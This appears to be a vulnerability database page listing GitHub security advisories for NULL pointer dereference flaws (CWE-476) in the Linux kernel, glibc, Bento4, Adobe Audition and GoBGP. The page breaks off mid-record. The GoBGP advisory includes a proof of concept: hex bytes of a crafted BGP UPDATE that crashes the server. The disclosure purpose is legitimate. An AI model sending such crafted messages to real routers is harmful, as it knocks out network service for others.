Common Weakness Enumeration

CWE-476

Allowed

NULL Pointer Dereference

Abstraction: Base · Status: Stable

The product dereferences a pointer that it expects to be valid but is NULL.

6305 vulnerabilities reference this CWE, most recent first.

GHSA-P3M3-Q487-PX67

Vulnerability from github – Published: 2025-06-18 12:30 – Updated: 2025-11-14 18:31
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

HID: steam: Prevent NULL pointer dereference in steam_{recv,send}_report

It is possible for a malicious device to forgo submitting a Feature Report. The HID Steam driver presently makes no prevision for this and de-references the 'struct hid_report' pointer obtained from the HID devices without first checking its validity. Let's change that.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-49984"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-18T11:15:25Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: steam: Prevent NULL pointer dereference in steam_{recv,send}_report\n\nIt is possible for a malicious device to forgo submitting a Feature\nReport.  The HID Steam driver presently makes no prevision for this\nand de-references the \u0027struct hid_report\u0027 pointer obtained from the\nHID devices without first checking its validity.  Let\u0027s change that.",
  "id": "GHSA-p3m3-q487-px67",
  "modified": "2025-11-14T18:31:23Z",
  "published": "2025-06-18T12:30:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-49984"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/989560b6d9e00d99e07bc33067fa1c770994bf4d"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/c20d03b82a2e3ddbb555dad4d4f3374a9763222c"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/cd11d1a6114bd4bc6450ae59f6e110ec47362126"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/dc815761948ab5b8c94db6cb53c95103588f16ae"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/dee1e51b54794e90763e70a3c78f27ba4fa930ec"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/fa2b822d86be5b5ad54fe4fa2daca464e71ff90a"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P3PX-X826-QQVW

Vulnerability from github – Published: 2022-05-24 19:15 – Updated: 2022-05-24 19:15
VLAI
Details

An issue was discovered in sela through 20200412. A NULL pointer dereference exists in the function file::WavFile::WavFile() located in wav_file.c. It allows an attacker to cause Denial of Service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-39549"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-09-20T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in sela through 20200412. A NULL pointer dereference exists in the function file::WavFile::WavFile() located in wav_file.c. It allows an attacker to cause Denial of Service.",
  "id": "GHSA-p3px-x826-qqvw",
  "modified": "2022-05-24T19:15:07Z",
  "published": "2022-05-24T19:15:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39549"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sahaRatul/sela/issues/27"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-P3V7-WJMC-7FH8

Vulnerability from github – Published: 2022-05-24 19:10 – Updated: 2025-05-30 21:30
VLAI
Details

In librt in the GNU C Library (aka glibc) through 2.34, sysdeps/unix/sysv/linux/mq_notify.c mishandles certain NOTIFY_REMOVED data, leading to a NULL pointer dereference. NOTE: this vulnerability was introduced as a side effect of the CVE-2021-33574 fix.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-38604"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-08-12T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "In librt in the GNU C Library (aka glibc) through 2.34, sysdeps/unix/sysv/linux/mq_notify.c mishandles certain NOTIFY_REMOVED data, leading to a NULL pointer dereference. NOTE: this vulnerability was introduced as a side effect of the CVE-2021-33574 fix.",
  "id": "GHSA-p3v7-wjmc-7fh8",
  "modified": "2025-05-30T21:30:52Z",
  "published": "2022-05-24T19:10:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38604"
    },
    {
      "type": "WEB",
      "url": "https://blog.tuxcare.com/cve/tuxcare-team-identifies-cve-2021-38604-a-new-vulnerability-in-glibc"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GYEXYM37RCJWJ6B5KQUYQI4NZBDDYSXP"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GYEXYM37RCJWJ6B5KQUYQI4NZBDDYSXP"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202208-24"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20210909-0005"
    },
    {
      "type": "WEB",
      "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28213"
    },
    {
      "type": "WEB",
      "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=4cc79c217744743077bf7a0ec5e0a4318f1e6641"
    },
    {
      "type": "WEB",
      "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=b805aebd42364fe696e417808a700fdb9800c9e8"
    },
    {
      "type": "WEB",
      "url": "https://sourceware.org/git/?p=glibc.git;a=commit;h=4cc79c217744743077bf7a0ec5e0a4318f1e6641"
    },
    {
      "type": "WEB",
      "url": "https://sourceware.org/git/?p=glibc.git;a=commit;h=b805aebd42364fe696e417808a700fdb9800c9e8"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P3W2-64XM-833J

Vulnerability from github – Published: 2026-05-05 20:57 – Updated: 2026-05-08 20:42
VLAI
Summary
GoBGP has a panic in AdjRib.Update via malformed BGP Update message (Nil Pointer Dereference)
Details

Summary

Remote Denial of Service (DoS) via Nil Pointer Dereference in BGP Update Processing An unauthenticated remote BGP peer can trigger a fatal panic in GoBGP by sending a specially crafted BGP UPDATE message. When the server receives a message with inconsistent attribute lengths, it improperly handles the internal state transition to a "withdraw" action, leading to a nil pointer dereference in the AdjRib.Update function. This causes the entire GoBGP process to crash, resulting in a complete loss of service availability.

Details

The vulnerability originates in the interaction between the BGP message decoding logic and the Adj-RIB table management.

Triggering Condition: When a BGP UPDATE message contains attributes that fail validation (e.g., "attribute value length is short"), GoBGP logs a warning: the received Update message was treated as withdraw.

Code Path:

The message reaches github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate.

Due to the malformed attributes, the message is processed as a withdrawal, but the internal representation of the path or its attributes becomes nil.

The execution flows to internal/pkg/table/adj.go:127 within (*AdjRib).Update.

The Flaw: At line 127 in adj.go, the code attempts to access a member of a structure (likely the path or a specific attribute container) that is nil due to the previous validation failure.

Log Snippet:

{"time":"2026-04-21T12:43:10.009107962+08:00","level":"WARN","msg":"the received Update message was treated as withdraw","Topic":"Peer","Key":"192.168.31.195","State":"BGP_FSM_ESTABLISHED","Error":"attribute value length is short"}
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0xbca9e8]

goroutine 52 [running]:
github.com/osrg/gobgp/v4/internal/pkg/table.(*AdjRib).Update(0x1fec929b4480, {0x1fec928ca0e8, 0x1, 0xfffffffffffffffc?})
        /home/base/Desktop/gobgp/internal/pkg/table/adj.go:127 +0xa8
github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate(0x1fec92b90c40, 0x1fec92c0c900)
        /home/base/Desktop/gobgp/pkg/server/peer.go:656 +0xed4
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).handleFSMMessage(0x1fec928c8488, 0x1fec92b90c40, 0x1fec92c0c900)
        /home/base/Desktop/gobgp/pkg/server/server.go:1670 +0x14c6
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).startFsmHandler.func1(0x1fec935c0b00?)
        /home/base/Desktop/gobgp/pkg/server/server.go:253 +0x25
github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).recvMessageloop(0x1fec92acee40, {0x105c750, 0x1fec92970500}, {0x106a558, 0x1fec933bc000}, 0x1fec92c1a2a0, 0x1fec92c18a10, 0x0?)
        /home/base/Desktop/gobgp/pkg/server/fsm.go:1893 +0xe82
created by github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).established in goroutine 37
        /home/base/Desktop/gobgp/pkg/server/fsm.go:1920 +0x2d5

PoC

[SEND] OPEN
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 1d 01 04 fd ea 00 5a c3 a8 1f c3 00
[RECV] Type: 1 | Length: 77
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 4d 01 04 fd e9 00 5a c0 a8 1f 82 30 02 2e 02 00 49 16 14 62 61 73 65 2d 76 69 72 74 75 61 6c 2d 6d 61 63 68 69 6e 65 00 01 04 00 19 00 46 41 04 00 00 fd e9 05 06 00 19 00 46 00 02
[+] Received OPEN from peer
[SEND] KEEPALIVE
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[RECV] Type: 4 | Length: 19
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[+] BGP Session Established
[SEND] Crafted UPDATE
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 50 02 00 04 18 ac 10 01 00 35 35 01 01 04 2d 02 00 90 0e 00 19 3e 01 a8 c0 1f 82 00 02 21 00 01 c0 a8 1f 12 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 11 22 33 44 55 0f 11 80 00
[*] Waiting for peer reaction...
[+] Done.

Impact

Remote Denial of Service (DoS) in GoBGP v4.4.0

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/osrg/gobgp/v4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.4.0"
            },
            {
              "fixed": "4.5.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "4.4.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42285"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T20:57:14Z",
    "nvd_published_at": "2026-05-07T12:16:18Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nRemote Denial of Service (DoS) via Nil Pointer Dereference in BGP Update Processing\nAn unauthenticated remote BGP peer can trigger a fatal panic in GoBGP by sending a specially crafted BGP UPDATE message. When the server receives a message with inconsistent attribute lengths, it improperly handles the internal state transition to a \"withdraw\" action, leading to a nil pointer dereference in the AdjRib.Update function. This causes the entire GoBGP process to crash, resulting in a complete loss of service availability.\n\n\n### Details\nThe vulnerability originates in the interaction between the BGP message decoding logic and the Adj-RIB table management.\n\nTriggering Condition: When a BGP UPDATE message contains attributes that fail validation (e.g., \"attribute value length is short\"), GoBGP logs a warning: the received Update message was treated as withdraw.\n\nCode Path:\n\nThe message reaches github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate.\n\nDue to the malformed attributes, the message is processed as a withdrawal, but the internal representation of the path or its attributes becomes nil.\n\nThe execution flows to internal/pkg/table/adj.go:127 within (*AdjRib).Update.\n\nThe Flaw: At line 127 in adj.go, the code attempts to access a member of a structure (likely the path or a specific attribute container) that is nil due to the previous validation failure.\n\nLog Snippet:\n```\n{\"time\":\"2026-04-21T12:43:10.009107962+08:00\",\"level\":\"WARN\",\"msg\":\"the received Update message was treated as withdraw\",\"Topic\":\"Peer\",\"Key\":\"192.168.31.195\",\"State\":\"BGP_FSM_ESTABLISHED\",\"Error\":\"attribute value length is short\"}\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0xbca9e8]\n\ngoroutine 52 [running]:\ngithub.com/osrg/gobgp/v4/internal/pkg/table.(*AdjRib).Update(0x1fec929b4480, {0x1fec928ca0e8, 0x1, 0xfffffffffffffffc?})\n        /home/base/Desktop/gobgp/internal/pkg/table/adj.go:127 +0xa8\ngithub.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate(0x1fec92b90c40, 0x1fec92c0c900)\n        /home/base/Desktop/gobgp/pkg/server/peer.go:656 +0xed4\ngithub.com/osrg/gobgp/v4/pkg/server.(*BgpServer).handleFSMMessage(0x1fec928c8488, 0x1fec92b90c40, 0x1fec92c0c900)\n        /home/base/Desktop/gobgp/pkg/server/server.go:1670 +0x14c6\ngithub.com/osrg/gobgp/v4/pkg/server.(*BgpServer).startFsmHandler.func1(0x1fec935c0b00?)\n        /home/base/Desktop/gobgp/pkg/server/server.go:253 +0x25\ngithub.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).recvMessageloop(0x1fec92acee40, {0x105c750, 0x1fec92970500}, {0x106a558, 0x1fec933bc000}, 0x1fec92c1a2a0, 0x1fec92c18a10, 0x0?)\n        /home/base/Desktop/gobgp/pkg/server/fsm.go:1893 +0xe82\ncreated by github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).established in goroutine 37\n        /home/base/Desktop/gobgp/pkg/server/fsm.go:1920 +0x2d5\n\n```\n\n### PoC\n```\n[SEND] OPEN\n       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 1d 01 04 fd ea 00 5a c3 a8 1f c3 00\n[RECV] Type: 1 | Length: 77\n       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 4d 01 04 fd e9 00 5a c0 a8 1f 82 30 02 2e 02 00 49 16 14 62 61 73 65 2d 76 69 72 74 75 61 6c 2d 6d 61 63 68 69 6e 65 00 01 04 00 19 00 46 41 04 00 00 fd e9 05 06 00 19 00 46 00 02\n[+] Received OPEN from peer\n[SEND] KEEPALIVE\n       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04\n[RECV] Type: 4 | Length: 19\n       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04\n[+] BGP Session Established\n[SEND] Crafted UPDATE\n       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 50 02 00 04 18 ac 10 01 00 35 35 01 01 04 2d 02 00 90 0e 00 19 3e 01 a8 c0 1f 82 00 02 21 00 01 c0 a8 1f 12 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 11 22 33 44 55 0f 11 80 00\n[*] Waiting for peer reaction...\n[+] Done.\n```\n\n### Impact\nRemote Denial of Service (DoS) in GoBGP v4.4.0",
  "id": "GHSA-p3w2-64xm-833j",
  "modified": "2026-05-08T20:42:39Z",
  "published": "2026-05-05T20:57:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/osrg/gobgp/security/advisories/GHSA-p3w2-64xm-833j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42285"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/osrg/gobgp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/osrg/gobgp/releases/tag/v4.5.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "GoBGP has a panic in AdjRib.Update via malformed BGP Update message (Nil Pointer Dereference)"
}

GHSA-P3W7-R2FC-GWW5

Vulnerability from github – Published: 2022-05-24 16:56 – Updated: 2024-04-04 01:57
VLAI
Details

Bento4 1.5.1-628 has a NULL pointer dereference in AP4_ByteStream::ReadUI32 in Core/Ap4ByteStream.cpp when called from the AP4_TrunAtom class.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-16349"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-09-16T13:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Bento4 1.5.1-628 has a NULL pointer dereference in AP4_ByteStream::ReadUI32 in Core/Ap4ByteStream.cpp when called from the AP4_TrunAtom class.",
  "id": "GHSA-p3w7-r2fc-gww5",
  "modified": "2024-04-04T01:57:44Z",
  "published": "2022-05-24T16:56:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16349"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axiomatic-systems/Bento4/issues/422"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P42M-58CH-MMH9

Vulnerability from github – Published: 2022-03-17 00:00 – Updated: 2022-03-17 00:00
VLAI
Details

Adobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-40737"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-03-16T15:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Adobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.",
  "id": "GHSA-p42m-58ch-mmh9",
  "modified": "2022-03-17T00:00:35Z",
  "published": "2022-03-17T00:00:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40737"
    },
    {
      "type": "WEB",
      "url": "https://helpx.adobe.com/security/products/audition/apsb21-92.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P42V-9GRR-C887

Vulnerability from github – Published: 2025-08-22 18:31 – Updated: 2025-11-26 18:30
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

ALSA: usb: scarlett2: Fix missing NULL check

scarlett2_input_select_ctl_info() sets up the string arrays allocated via kasprintf(), but it misses NULL checks, which may lead to NULL dereference Oops. Let's add the proper NULL check.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-38629"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-22T16:15:36Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb: scarlett2: Fix missing NULL check\n\nscarlett2_input_select_ctl_info() sets up the string arrays allocated\nvia kasprintf(), but it misses NULL checks, which may lead to NULL\ndereference Oops.  Let\u0027s add the proper NULL check.",
  "id": "GHSA-p42v-9grr-c887",
  "modified": "2025-11-26T18:30:59Z",
  "published": "2025-08-22T18:31:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38629"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/2c735fcaee81ad8056960659dc9dc460891e76b0"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/d558db85920b124bac36f8a7ddc5de0aa7491bdd"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/df485a4b2b3ee5b35c80f990beb554e38a8a5fb1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P46C-P6JP-XFPQ

Vulnerability from github – Published: 2024-07-12 15:31 – Updated: 2026-05-12 12:32
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

ipv6: fix possible race in __fib6_drop_pcpu_from()

syzbot found a race in __fib6_drop_pcpu_from() [1]

If compiler reads more than once (*ppcpu_rt), second read could read NULL, if another cpu clears the value in rt6_get_pcpu_route().

Add a READ_ONCE() to prevent this race.

Also add rcu_read_lock()/rcu_read_unlock() because we rely on RCU protection while dereferencing pcpu_rt.

[1]

Oops: general protection fault, probably for non-canonical address 0xdffffc0000000012: 0000 [#1] PREEMPT SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000090-0x0000000000000097] CPU: 0 PID: 7543 Comm: kworker/u8:17 Not tainted 6.10.0-rc1-syzkaller-00013-g2bfcfd584ff5 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024 Workqueue: netns cleanup_net RIP: 0010:__fib6_drop_pcpu_from.part.0+0x10a/0x370 net/ipv6/ip6_fib.c:984 Code: f8 48 c1 e8 03 80 3c 28 00 0f 85 16 02 00 00 4d 8b 3f 4d 85 ff 74 31 e8 74 a7 fa f7 49 8d bf 90 00 00 00 48 89 f8 48 c1 e8 03 <80> 3c 28 00 0f 85 1e 02 00 00 49 8b 87 90 00 00 00 48 8b 0c 24 48 RSP: 0018:ffffc900040df070 EFLAGS: 00010206 RAX: 0000000000000012 RBX: 0000000000000001 RCX: ffffffff89932e16 RDX: ffff888049dd1e00 RSI: ffffffff89932d7c RDI: 0000000000000091 RBP: dffffc0000000000 R08: 0000000000000005 R09: 0000000000000007 R10: 0000000000000001 R11: 0000000000000006 R12: ffff88807fa080b8 R13: fffffbfff1a9a07d R14: ffffed100ff41022 R15: 0000000000000001 FS: 0000000000000000(0000) GS:ffff8880b9200000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000001b32c26000 CR3: 000000005d56e000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: __fib6_drop_pcpu_from net/ipv6/ip6_fib.c:966 [inline] fib6_drop_pcpu_from net/ipv6/ip6_fib.c:1027 [inline] fib6_purge_rt+0x7f2/0x9f0 net/ipv6/ip6_fib.c:1038 fib6_del_route net/ipv6/ip6_fib.c:1998 [inline] fib6_del+0xa70/0x17b0 net/ipv6/ip6_fib.c:2043 fib6_clean_node+0x426/0x5b0 net/ipv6/ip6_fib.c:2205 fib6_walk_continue+0x44f/0x8d0 net/ipv6/ip6_fib.c:2127 fib6_walk+0x182/0x370 net/ipv6/ip6_fib.c:2175 fib6_clean_tree+0xd7/0x120 net/ipv6/ip6_fib.c:2255 __fib6_clean_all+0x100/0x2d0 net/ipv6/ip6_fib.c:2271 rt6_sync_down_dev net/ipv6/route.c:4906 [inline] rt6_disable_ip+0x7ed/0xa00 net/ipv6/route.c:4911 addrconf_ifdown.isra.0+0x117/0x1b40 net/ipv6/addrconf.c:3855 addrconf_notify+0x223/0x19e0 net/ipv6/addrconf.c:3778 notifier_call_chain+0xb9/0x410 kernel/notifier.c:93 call_netdevice_notifiers_info+0xbe/0x140 net/core/dev.c:1992 call_netdevice_notifiers_extack net/core/dev.c:2030 [inline] call_netdevice_notifiers net/core/dev.c:2044 [inline] dev_close_many+0x333/0x6a0 net/core/dev.c:1585 unregister_netdevice_many_notify+0x46d/0x19f0 net/core/dev.c:11193 unregister_netdevice_many net/core/dev.c:11276 [inline] default_device_exit_batch+0x85b/0xae0 net/core/dev.c:11759 ops_exit_list+0x128/0x180 net/core/net_namespace.c:178 cleanup_net+0x5b7/0xbf0 net/core/net_namespace.c:640 process_one_work+0x9fb/0x1b60 kernel/workqueue.c:3231 process_scheduled_works kernel/workqueue.c:3312 [inline] worker_thread+0x6c8/0xf70 kernel/workqueue.c:3393 kthread+0x2c1/0x3a0 kernel/kthread.c:389 ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-40905"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-12T13:15:13Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix possible race in __fib6_drop_pcpu_from()\n\nsyzbot found a race in __fib6_drop_pcpu_from() [1]\n\nIf compiler reads more than once (*ppcpu_rt),\nsecond read could read NULL, if another cpu clears\nthe value in rt6_get_pcpu_route().\n\nAdd a READ_ONCE() to prevent this race.\n\nAlso add rcu_read_lock()/rcu_read_unlock() because\nwe rely on RCU protection while dereferencing pcpu_rt.\n\n[1]\n\nOops: general protection fault, probably for non-canonical address 0xdffffc0000000012: 0000 [#1] PREEMPT SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000090-0x0000000000000097]\nCPU: 0 PID: 7543 Comm: kworker/u8:17 Not tainted 6.10.0-rc1-syzkaller-00013-g2bfcfd584ff5 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024\nWorkqueue: netns cleanup_net\n RIP: 0010:__fib6_drop_pcpu_from.part.0+0x10a/0x370 net/ipv6/ip6_fib.c:984\nCode: f8 48 c1 e8 03 80 3c 28 00 0f 85 16 02 00 00 4d 8b 3f 4d 85 ff 74 31 e8 74 a7 fa f7 49 8d bf 90 00 00 00 48 89 f8 48 c1 e8 03 \u003c80\u003e 3c 28 00 0f 85 1e 02 00 00 49 8b 87 90 00 00 00 48 8b 0c 24 48\nRSP: 0018:ffffc900040df070 EFLAGS: 00010206\nRAX: 0000000000000012 RBX: 0000000000000001 RCX: ffffffff89932e16\nRDX: ffff888049dd1e00 RSI: ffffffff89932d7c RDI: 0000000000000091\nRBP: dffffc0000000000 R08: 0000000000000005 R09: 0000000000000007\nR10: 0000000000000001 R11: 0000000000000006 R12: ffff88807fa080b8\nR13: fffffbfff1a9a07d R14: ffffed100ff41022 R15: 0000000000000001\nFS:  0000000000000000(0000) GS:ffff8880b9200000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000001b32c26000 CR3: 000000005d56e000 CR4: 00000000003526f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n  __fib6_drop_pcpu_from net/ipv6/ip6_fib.c:966 [inline]\n  fib6_drop_pcpu_from net/ipv6/ip6_fib.c:1027 [inline]\n  fib6_purge_rt+0x7f2/0x9f0 net/ipv6/ip6_fib.c:1038\n  fib6_del_route net/ipv6/ip6_fib.c:1998 [inline]\n  fib6_del+0xa70/0x17b0 net/ipv6/ip6_fib.c:2043\n  fib6_clean_node+0x426/0x5b0 net/ipv6/ip6_fib.c:2205\n  fib6_walk_continue+0x44f/0x8d0 net/ipv6/ip6_fib.c:2127\n  fib6_walk+0x182/0x370 net/ipv6/ip6_fib.c:2175\n  fib6_clean_tree+0xd7/0x120 net/ipv6/ip6_fib.c:2255\n  __fib6_clean_all+0x100/0x2d0 net/ipv6/ip6_fib.c:2271\n  rt6_sync_down_dev net/ipv6/route.c:4906 [inline]\n  rt6_disable_ip+0x7ed/0xa00 net/ipv6/route.c:4911\n  addrconf_ifdown.isra.0+0x117/0x1b40 net/ipv6/addrconf.c:3855\n  addrconf_notify+0x223/0x19e0 net/ipv6/addrconf.c:3778\n  notifier_call_chain+0xb9/0x410 kernel/notifier.c:93\n  call_netdevice_notifiers_info+0xbe/0x140 net/core/dev.c:1992\n  call_netdevice_notifiers_extack net/core/dev.c:2030 [inline]\n  call_netdevice_notifiers net/core/dev.c:2044 [inline]\n  dev_close_many+0x333/0x6a0 net/core/dev.c:1585\n  unregister_netdevice_many_notify+0x46d/0x19f0 net/core/dev.c:11193\n  unregister_netdevice_many net/core/dev.c:11276 [inline]\n  default_device_exit_batch+0x85b/0xae0 net/core/dev.c:11759\n  ops_exit_list+0x128/0x180 net/core/net_namespace.c:178\n  cleanup_net+0x5b7/0xbf0 net/core/net_namespace.c:640\n  process_one_work+0x9fb/0x1b60 kernel/workqueue.c:3231\n  process_scheduled_works kernel/workqueue.c:3312 [inline]\n  worker_thread+0x6c8/0xf70 kernel/workqueue.c:3393\n  kthread+0x2c1/0x3a0 kernel/kthread.c:389\n  ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147\n  ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244",
  "id": "GHSA-p46c-p6jp-xfpq",
  "modified": "2026-05-12T12:32:01Z",
  "published": "2024-07-12T15:31:27Z",
  "references": [
    {
      "type": "ADVISORY",
